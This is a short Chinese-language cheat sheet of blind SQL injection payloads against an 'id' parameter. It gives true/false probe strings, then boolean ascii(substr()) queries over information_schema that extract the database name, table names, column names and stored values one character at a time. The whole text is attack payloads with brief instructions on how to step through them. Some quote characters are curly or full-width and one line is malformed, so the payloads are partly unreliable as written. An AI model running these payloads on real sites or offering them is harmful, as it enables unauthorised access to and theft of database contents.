- 构造判断语句 id =1 and 1=2 id =1’ and 1=2 –+ id =1“ and 1=2 –+
- 构造暴库语句 :
id=1‘ and length(database())>1 --+ //增1这个数字大小来判断库名长度
id 1’ and ascii(substr(database(),1,1)) > 1 --+ //增加1这个数据来判断数据库名的第一个字母ascii值大小,参考码表
id=1‘ and ascii(substr((select table_name from information_schema.tables where table_schema='库名' limit 0,1),1,1))>1 --+ //表名
id =1‘ and ascii(substr((select column_name from information_schema. columns where TABLE_name = 'your table' and table_schema = '库名' limit 0,1),1,1)) //列名
id=1‘ and ascii(substr((select ’列名‘ from '表名' limit 0,1),1,1)) //爆值